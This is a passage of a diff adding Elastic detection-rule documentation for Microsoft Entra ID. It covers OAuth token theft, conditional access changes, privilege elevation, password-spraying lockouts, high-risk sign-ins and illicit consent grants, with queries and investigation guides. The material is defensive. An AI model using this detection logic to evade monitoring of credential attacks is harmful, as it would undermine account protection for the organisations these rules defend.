count_distinct(Esql.azure_signinlogs_properties_authentication_device_code_case), + Esql.azure_signinlogs_properties_auth_visual_studio_count_distinct = count_distinct(Esql.azure_signinlogs_auth_visual_studio_case), + Esql.azure_signinlogs_properties_auth_other_count_distinct = count_distinct(Esql.azure_signinlogs_auth_other_case), + 
Esql.azure_signinlogs_properties_source_ip_count_distinct = count_distinct(source.ip), + Esql.azure_signinlogs_properties_source_ip_values = values(source.ip), + Esql.azure_signinlogs_properties_client_app_values = values(azure.signinlogs.properties.app_display_name), + Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name), + Esql.azure_signinlogs_properties_auth_requirement_values = values(azure.signinlogs.properties.authentication_requirement) + by azure.signinlogs.identity + +// Detect multiple unique IPs for one user with signs of deviceCode or VSC OAuth usage +| where + Esql.azure_signinlogs_properties_source_ip_count_distinct >= 2 + and ( + Esql.azure_signinlogs_properties_authentication_device_code_case_count_distinct > 0 + or Esql.azure_signinlogs_properties_auth_visual_studio_count_distinct > 0 + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc new file mode 100644 index 0000000000..91ec86dfa2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc @@ -0,0 +1,135 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-conditional-access-policy-cap-modified]] +=== Microsoft Entra ID Conditional Access Policy (CAP) Modified + +Identifies a modification to a conditional access policy (CAP) in Microsoft Entra ID. Adversaries may modify existing CAPs to loosen access controls and maintain persistence in the environment with a compromised identity or entity. 
+ +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.auditlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview +* https://www.rezonate.io/blog/microsoft-entra-id-the-complete-guide-to-conditional-access-policies/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Use Case: Configuration Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigation Guide: Microsoft Entra ID Conditional Access Policy (CAP) Modified* + + +Azure Conditional Access Policies (CAPs) are critical for enforcing secure access requirements such as multi-factor authentication (MFA), restricting specific users or groups, and managing sign-in conditions. Modifying these policies can be a technique for weakening an organization’s defenses and maintaining persistence after initial access. + +This rule detects a successful update to a Conditional Access Policy in Microsoft Entra ID (formerly Azure AD). + + +*Possible Investigation Steps* + + +- **Identify the user who modified the policy:** + - Check the value of `azure.auditlogs.properties.initiated_by.user.userPrincipalName` to determine the identity that made the change. + - Investigate their recent activity to determine if this change was expected or authorized. + +- **Review the modified policy name:** + - Look at `azure.auditlogs.properties.target_resources.*.display_name` to find the name of the affected policy. + - Determine whether this policy is related to critical controls (e.g., requiring MFA for admins). + +- **Analyze the policy change:** + - Compare the `old_value` and `new_value` fields under `azure.auditlogs.properties.target_resources.*.modified_properties.*`. + - Look for security-reducing changes, such as: + - Removing users/groups from enforcement. + - Disabling MFA or risk-based conditions. + - Introducing exclusions that reduce the policy’s coverage. + +- **Correlate with other activity:** + - Pivot on `azure.auditlogs.properties.activity_datetime` to identify if any suspicious sign-ins occurred after the policy was modified. + - Check for related authentication logs, particularly from the same IP address (`azure.auditlogs.properties.initiated_by.user.ipAddress`). + +- **Assess the user's legitimacy:** + - Review the initiator’s Azure role, group memberships, and whether their account was recently elevated or compromised. + - Investigate whether this user has a history of modifying policies or if this is anomalous. + + +*Validation & False Positive Considerations* + + +- **Authorized administrative changes:** Some organizations routinely update CAPs as part of policy tuning or role-based access reviews. +- **Security reviews or automation:** Scripts, CI/CD processes, or third-party compliance tools may programmatically update CAPs. +- **Employee lifecycle events:** Policy changes during employee onboarding/offboarding may include updates to access policies. 
+ +If any of these cases apply and align with the activity's context, consider tuning the rule or adding exceptions for expected patterns. + + +*Response & Remediation* + + +- Revert unauthorized or insecure changes to the Conditional Access Policy immediately. +- Temporarily increase monitoring of CAP modifications and sign-in attempts. +- Lock or reset the credentials of the user account that made the change if compromise is suspected. +- Conduct a broader access review of conditional access policies and privileged user activity. +- Implement stricter change management and alerting around CAP changes. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.auditlogs" + and event.action:"Update conditional access policy" + and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: https://attack.mitre.org/techniques/T1556/ +* Sub-technique: +** Name: Conditional Access Policies +** ID: T1556.009 +** Reference URL: https://attack.mitre.org/techniques/T1556/009/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc new file mode 100644 index 0000000000..8802d6a14f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc @@ -0,0 +1,129 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-elevated-access-to-user-access-administrator]] +=== Microsoft Entra ID Elevated Access to User Access Administrator + +Identifies when a user has elevated their access to User Access Administrator for their Azure Resources. The User Access Administrator role allows users to manage user access to Azure resources, including the ability to assign roles and permissions. Adversaries may target an Entra ID Global Administrator or other privileged role to elevate their access to User Access Administrator, which can lead to further privilege escalation and unauthorized access to sensitive resources. This is a New Terms rule that only signals if the user principal name has not been seen doing this activity in the last 14 days. 
+ +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.auditlogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/azure/role-based-access-control/elevate-access-global-admin?tabs=azure-portal%2Centra-audit-logs/ +* https://permiso.io/blog/azures-apex-permissions-elevate-access-the-logs-security-teams-overlook +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Microsoft Entra ID Elevated Access to User Access Administrator* + + +This rule identifies when a user elevates their permissions to the "User Access Administrator" role in Azure RBAC. This role allows full control over access management for Azure resources and can be abused by attackers for lateral movement, persistence, or privilege escalation. Since this is a New Terms rule, the alert will only trigger if the user has not performed this elevation in the past 14 days, helping reduce alert fatigue. + + +*Possible investigation steps* + + +- Review the `azure.auditlogs.properties.initiated_by.user.userPrincipalName` field to identify the user who elevated access. +- Check `source.ip` and associated `source.geo.*` fields to determine the origin of the action. Confirm whether the IP, ASN, and location are expected for this user. +- Investigate the application ID from `azure.auditlogs.properties.additional_details.value` to determine which interface or method was used to elevate access. +- Pivot to Azure `signinlogs` or Entra `auditlogs` to: + - Review recent login history for the user. + - Look for unusual sign-in patterns or MFA prompts. + - Determine whether the account has performed any other privilege-related operations. +- Correlate with directory role assignments or role-based access control (RBAC) modifications to assess whether the elevated access was used to add roles or modify permissions. + + +*False positive analysis* + + +- Legitimate admin actions may involve access elevation during maintenance, migration, or investigations. +- Some IT departments may elevate access temporarily without leaving structured change records. +- Review internal tickets, change logs, or admin activity dashboards for approved operations. + + +*Response and remediation* + + +- If elevation was not authorized: + - Immediately remove the User Access Administrator role from the account. + - Disable or lock the account and begin credential rotation. + - Audit activity performed by the account after elevation, especially changes to role assignments and resource access. +- If suspicious: + - Notify the user and confirm whether they performed the action. + - Check for any automation or scripts that could be exploiting unused elevated access paths. + - Review conditional access and PIM (Privileged Identity Management) configurations to limit elevation without approval. 
+- Strengthen posture: + - Require MFA and approval for all privilege escalation actions. + - Consider enabling JIT (Just-in-Time) access with expiration. + - Add alerts for repeated or unusual use of `Microsoft.Authorization/elevateAccess/action`. + + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: azure.auditlogs + and ( + azure.auditlogs.operation_name: "User has elevated their access to User Access Administrator for their Azure Resources" or + azure.auditlogs.properties.additional_details.value: "Microsoft.Authorization/elevateAccess/action" + ) and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc new file mode 100644 index 0000000000..053856b819 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc @@ -0,0 +1,222 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-exccessive-account-lockouts-detected]] +=== Microsoft Entra ID Exccessive Account Lockouts Detected + +Identifies a high count of failed Microsoft Entra ID sign-in attempts as the result of the target user account being locked out. Adversaries may attempt to brute-force user accounts by repeatedly trying to authenticate with incorrect credentials, leading to account lockouts by Entra ID Smart Lockout policies. 
+ +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 15m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/ +* https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying +* https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray +* https://www.sprocketsecurity.com/blog/exploring-modern-password-spraying +* https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties +* https://learn.microsoft.com/en-us/entra/identity-platform/reference-error-codes +* https://github.com/0xZDH/Omnispray +* https://github.com/0xZDH/o365spray + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID Exccessive Account Lockouts Detected* + + +This rule detects a high number of sign-in failures due to account lockouts (error code `50053`) in Microsoft Entra ID sign-in logs. These lockouts are typically caused by repeated authentication failures, often as a result of brute-force tactics such as password spraying, credential stuffing, or automated guessing. This detection is time-bucketed and aggregates attempts to identify bursts or coordinated campaigns targeting multiple users. + + +*Possible investigation steps* + + +- Review `user_id_list` and `user_principal_name`: Check if targeted users include high-value accounts such as administrators, service principals, or shared inboxes. +- Check `error_codes` and `result_description`: Validate that `50053` (account locked) is the consistent failure type. Messages indicating "malicious IP" activity suggest Microsoft’s backend flagged the source. +- Analyze `ip_list` and `source_orgs`: Identify whether the activity originated from known malicious infrastructure (e.g., VPNs, botnets, or public cloud providers). In the example, traffic originates from `MASSCOM`, which should be validated. +- Inspect `device_detail_browser` and `user_agent`: Clients like `"Python Requests"` indicate scripted automation rather than legitimate login attempts. +- Evaluate `unique_users` vs. `total_attempts`: A high ratio suggests distributed attacks across multiple accounts, characteristic of password spraying. +- Correlate `client_app_display_name` and `incoming_token_type`: PowerShell or unattended sign-in clients may be targeted for automation or legacy auth bypass. +- Review `conditional_access_status` and `risk_state`: If Conditional Access was not applied and risk was not flagged, policy scope or coverage should be reviewed. +- Validate time range (`first_seen`, `last_seen`): Determine whether the attack is a short burst or part of a longer campaign. + + +*False positive analysis* + + +- Misconfigured clients, scripts, or services with outdated credentials may inadvertently cause lockouts. +- Repeated lockouts from known internal IPs or during credential rotation windows could be benign. 
+- Legacy applications without modern auth support may repeatedly fail and trigger Smart Lockout. +- Specific known user agents (e.g., corporate service accounts). +- Internal IPs or cloud-hosted automation with expected failure behavior. + + +*Response and remediation* + + +- Investigate locked accounts immediately. Confirm if the account was successfully accessed prior to lockout. +- Reset credentials for impacted users and enforce MFA before re-enabling accounts. +- Block malicious IPs or ASN at the firewall, identity provider, or Conditional Access level. +- Audit authentication methods in use, and enforce modern auth (OAuth, SAML) over legacy protocols. +- Strengthen Conditional Access policies to reduce exposure from weak locations, apps, or clients. +- Conduct credential hygiene audits to assess reuse and rotation for targeted accounts. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.signinlogs-* + +| eval + Esql.time_window_date_trunc = date_trunc(30 minutes, @timestamp), + Esql_priv.azure_signinlogs_properties_user_principal_name_lower = to_lower(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_properties_incoming_token_type_lower = to_lower(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_app_display_name_lower = to_lower(azure.signinlogs.properties.app_display_name) + +| where event.dataset == "azure.signinlogs" + and event.category == "authentication" + and azure.signinlogs.category in ("NonInteractiveUserSignInLogs", "SignInLogs") + and event.outcome == "failure" + and azure.signinlogs.properties.authentication_requirement == "singleFactorAuthentication" + and azure.signinlogs.properties.status.error_code == 50053 + and azure.signinlogs.properties.user_principal_name is not null + and azure.signinlogs.properties.user_principal_name != "" + and source.`as`.organization.name != "MICROSOFT-CORP-MSN-as-BLOCK" + +| stats + Esql.azure_signinlogs_properties_authentication_requirement_values = values(azure.signinlogs.properties.authentication_requirement), + Esql.azure_signinlogs_properties_app_id_values = values(azure.signinlogs.properties.app_id), + Esql.azure_signinlogs_properties_app_display_name_values = values(azure.signinlogs.properties.app_display_name), + Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id), + Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name), + Esql.azure_signinlogs_properties_conditional_access_status_values = values(azure.signinlogs.properties.conditional_access_status), + Esql.azure_signinlogs_properties_device_detail_browser_values = values(azure.signinlogs.properties.device_detail.browser), + Esql.azure_signinlogs_properties_device_detail_device_id_values = values(azure.signinlogs.properties.device_detail.device_id), + Esql.azure_signinlogs_properties_device_detail_operating_system_values = values(azure.signinlogs.properties.device_detail.operating_system), + Esql.azure_signinlogs_properties_incoming_token_type_values = values(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_risk_state_values = values(azure.signinlogs.properties.risk_state), + Esql.azure_signinlogs_properties_session_id_values = values(azure.signinlogs.properties.session_id), + Esql.azure_signinlogs_properties_user_id_values = values(azure.signinlogs.properties.user_id), + 
Esql_priv.azure_signinlogs_properties_user_principal_name_values = values(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_result_description_values = values(azure.signinlogs.result_description), + Esql.azure_signinlogs_result_signature_values = values(azure.signinlogs.result_signature), + Esql.azure_signinlogs_result_type_values = values(azure.signinlogs.result_type), + + Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct = count_distinct(Esql_priv.azure_signinlogs_properties_user_principal_name_lower), + Esql_priv.azure_signinlogs_properties_user_principal_name_lower_values = values(Esql_priv.azure_signinlogs_properties_user_principal_name_lower), + Esql.azure_signinlogs_result_description_count_distinct = count_distinct(azure.signinlogs.result_description), + Esql.azure_signinlogs_properties_status_error_code_count_distinct = count_distinct(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_status_error_code_values = values(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_incoming_token_type_lower_values = values(Esql.azure_signinlogs_properties_incoming_token_type_lower), + Esql.azure_signinlogs_properties_app_display_name_lower_values = values(Esql.azure_signinlogs_properties_app_display_name_lower), + Esql.source_ip_values = values(source.ip), + Esql.source_ip_count_distinct = count_distinct(source.ip), + Esql.source_as_organization_name_values = values(source.`as`.organization.name), + Esql.source_as_organization_name_count_distinct = count_distinct(source.`as`.organization.name), + Esql.source_geo_country_name_values = values(source.geo.country_name), + Esql.source_geo_country_name_count_distinct = count_distinct(source.geo.country_name), + Esql.@timestamp.min = min(@timestamp), + Esql.@timestamp.max = max(@timestamp), + Esql.event_count = count() +by Esql.time_window_date_trunc + +| where Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct >= 15 and Esql.event_count >= 20 + +| keep + Esql.time_window_date_trunc, + Esql.event_count, + Esql.@timestamp.min, + Esql.@timestamp.max, + Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct, + Esql_priv.azure_signinlogs_properties_user_principal_name_lower_values, + Esql.azure_signinlogs_result_description_count_distinct, + Esql.azure_signinlogs_result_description_values, + Esql.azure_signinlogs_properties_status_error_code_count_distinct, + Esql.azure_signinlogs_properties_status_error_code_values, + Esql.azure_signinlogs_properties_incoming_token_type_lower_values, + Esql.azure_signinlogs_properties_app_display_name_lower_values, + Esql.source_ip_values, + Esql.source_ip_count_distinct, + Esql.source_as_organization_name_values, + Esql.source_as_organization_name_count_distinct, + Esql.source_geo_country_name_values, + Esql.source_geo_country_name_count_distinct, + Esql.azure_signinlogs_properties_authentication_requirement_values, + Esql.azure_signinlogs_properties_app_id_values, + Esql.azure_signinlogs_properties_app_display_name_values, + Esql.azure_signinlogs_properties_resource_id_values, + Esql.azure_signinlogs_properties_resource_display_name_values, + Esql.azure_signinlogs_properties_conditional_access_status_values, + Esql.azure_signinlogs_properties_device_detail_browser_values, + Esql.azure_signinlogs_properties_device_detail_device_id_values, + Esql.azure_signinlogs_properties_device_detail_operating_system_values, + 
Esql.azure_signinlogs_properties_incoming_token_type_values, + Esql.azure_signinlogs_properties_risk_state_values, + Esql.azure_signinlogs_properties_session_id_values, + Esql.azure_signinlogs_properties_user_id_values, + Esql_priv.azure_signinlogs_properties_user_principal_name_values, + Esql.azure_signinlogs_result_description_values, + Esql.azure_signinlogs_result_signature_values, + Esql.azure_signinlogs_result_type_values + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-high-risk-sign-in.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-high-risk-sign-in.asciidoc new file mode 100644 index 0000000000..5786826873 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-high-risk-sign-in.asciidoc @@ -0,0 +1,124 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-high-risk-sign-in]] +=== Microsoft Entra ID High Risk Sign-in + +Identifies high risk Microsoft Entra ID sign-ins by leveraging Microsoft's Identity Protection machine learning and heuristics. Identity Protection categorizes risk into three tiers: low, medium, and high. While Microsoft does not provide specific details about how risk is calculated, each level brings higher confidence that the user or sign-in is compromised. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/howto-conditional-access-policy-risk +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Initial Access + +*Version*: 109 + +*Rule authors*: + +* Elastic +* Willem D'Haese + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID High Risk Sign-in* + + +This rule detects high-risk sign-ins in Microsoft Entra ID as identified by Identity Protection. These sign-ins are flagged with a risk level of `high` during the authentication process, indicating a strong likelihood of compromise based on Microsoft’s machine learning and heuristics. 
This alert is valuable for identifying accounts under active attack or compromise using valid credentials. + + +*Possible investigation steps* + + +- Review the `azure.signinlogs.properties.user_id` and associated identity fields to determine the impacted user. +- Inspect the `risk_level_during_signin` field and confirm it is set to `high`. If `risk_level_aggregated` is also present and high, this suggests sustained risk across multiple sign-ins. +- Check `source.ip`, `source.geo.country_name`, and `source.as.organization.name` to evaluate the origin of the sign-in attempt. Flag unexpected geolocations or ASNs (e.g., anonymizers or residential ISPs). +- Review the `device_detail` fields such as `operating_system` and `browser` for new or unrecognized devices. +- Validate the `client_app_used` (e.g., legacy protocols, desktop clients) and `app_display_name` (e.g., Office 365 Exchange Online) to assess if risky legacy methods were involved. +- Examine `applied_conditional_access_policies` to verify if MFA or blocking policies were triggered or bypassed. +- Check `authentication_details.authentication_method` to see if multi-factor authentication was satisfied (e.g., "Mobile app notification"). +- Correlate this activity with other alerts or sign-ins from the same account within the last 24–48 hours. +- Contact the user to confirm if the sign-in was expected. If not, treat the account as compromised and proceed with containment. + + +*False positive analysis* + + +- Risky sign-ins may be triggered during legitimate travel, VPN use, or remote work scenarios from unusual locations. +- In some cases, users switching devices or networks rapidly may trigger high-risk scores. +- Automated scanners or penetration tests using known credentials may mimic high-risk login behavior. +- Confirm whether the risk was remediated automatically by Microsoft Identity Protection before proceeding with escalations. + + +*Response and remediation* + + +- If compromise is suspected, immediately disable the user account and revoke active sessions and tokens. +- Initiate credential reset and ensure multi-factor authentication is enforced. +- Review audit logs and sign-in history for the account to assess lateral movement or data access post sign-in. +- Inspect activity on services such as Exchange, SharePoint, or Azure resources to understand the impact. +- Determine if the attacker leveraged other accounts or escalated privileges. +- Use the incident findings to refine conditional access policies, such as enforcing MFA for high-risk sign-ins or blocking legacy protocols. +- Review and tighten policies that allow sign-ins from high-risk geographies or unknown devices. 
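+
+For the correlation step in the triage guidance above, a minimal KQL pivot over the sign-in logs can be run in Discover. This is a sketch only: it assumes the `azure.signinlogs.properties.user_id` value is taken from the alert, and the placeholder below is hypothetical.
+
+[source, js]
+----------------------------------
+event.dataset: "azure.signinlogs" and
+  azure.signinlogs.properties.user_id: "<user-id-from-alert>" and
+  azure.signinlogs.properties.risk_level_during_signin: ("high" or "medium" or "low")
+
+----------------------------------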
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+event.dataset:azure.signinlogs and
+  (
+    azure.signinlogs.properties.risk_level_during_signin:high or
+    azure.signinlogs.properties.risk_level_aggregated:high
+  )
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Initial Access
+** ID: TA0001
+** Reference URL: https://attack.mitre.org/tactics/TA0001/
+* Technique:
+** Name: Valid Accounts
+** ID: T1078
+** Reference URL: https://attack.mitre.org/techniques/T1078/
+* Sub-technique:
+** Name: Cloud Accounts
+** ID: T1078.004
+** Reference URL: https://attack.mitre.org/techniques/T1078/004/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc
new file mode 100644
index 0000000000..bd9172ef44
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc
@@ -0,0 +1,138 @@
+[[prebuilt-rule-8-19-8-microsoft-entra-id-illicit-consent-grant-via-registered-application]]
+=== Microsoft Entra ID Illicit Consent Grant via Registered Application
+
+Identifies an illicit consent grant request on behalf of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client application to access resources on behalf of the user.
+
+*Rule type*: new_terms
+
+*Rule indices*:
+
+* logs-azure.auditlogs-*
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://www.wiz.io/blog/midnight-blizzard-microsoft-breach-analysis-and-best-practices
+* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide
+* https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/
+* https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps
+
+*Tags*:
+
+* Domain: Cloud
+* Data Source: Azure
+* Data Source: Microsoft Entra ID
+* Data Source: Microsoft Entra ID Audit Logs
+* Use Case: Identity and Access Audit
+* Resources: Investigation Guide
+* Tactic: Initial Access
+* Tactic: Credential Access
+
+*Version*: 218
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Microsoft Entra ID Illicit Consent Grant via Registered Application*
+
+
+Adversaries may register a malicious application in Microsoft Entra ID and trick users into granting excessive permissions via OAuth consent. These applications can access sensitive data, such as mail, profiles, or files, on behalf of the user once consent is granted. This is commonly delivered via spearphishing links that prompt users to approve permissions for seemingly legitimate applications. 
+ +This rule identifies a new consent grant event based on Azure audit logs where the application was granted access with potentially risky scopes, such as offline_access, Mail.Read, or User.Read, and may include admin consent or tenant-wide delegation. + +This is a New Terms rule that will only trigger if the user and client ID have not been seen doing this activity in the last 14 days. + + +*Possible investigation steps* + + +- Review `azure.auditlogs.properties.additional_details.value` to identify the AppId and User-Agent values to determine which application was granted access and how the request was initiated. Pivot on the AppId in the Azure portal under Enterprise Applications to investigate further. +- Review `azure.auditlogs.properties.initiated_by.user.userPrincipalName` to identify the user who approved the application. Investigate their recent activity for signs of phishing, account compromise, or anomalous behavior during the timeframe of the consent. +- Review `azure.auditlogs.properties.initiated_by.user.ipAddress` to assess the geographic source of the consent action. Unexpected locations or IP ranges may indicate adversary-controlled infrastructure. +- Review `azure.auditlogs.properties.target_resources.display_name` to evaluate whether the application name is familiar, expected, or potentially spoofing a known service. +- Review `azure.auditlogs.properties.target_resources.modified_properties.display_name` to inspect key indicators of elevated privilege or risk, including: + - ConsentContext.IsAdminConsent to determine if the application was granted tenant-wide admin access. + - ConsentContext.OnBehalfOfAll to identify whether the app was granted permissions on behalf of all users in the tenant. + - ConsentAction.Permissions to evaluate the specific scopes and data access the application requested. + - ConsentAction.Reason to understand if Microsoft flagged the activity or if any reason was recorded by the platform. + - TargetId.ServicePrincipalNames to confirm the service principal associated with the granted permissions. +- Review `azure.tenant_id` to confirm the activity originated from your tenant and is not related to a cross-tenant application. +- Review `@timestamp` and `azure.auditlogs.properties.correlation_id` to pivot into related sign-in, token usage, or application activity for further context. + + +*False positive analysis* + + +- Some applications may request high-privilege scopes for legitimate 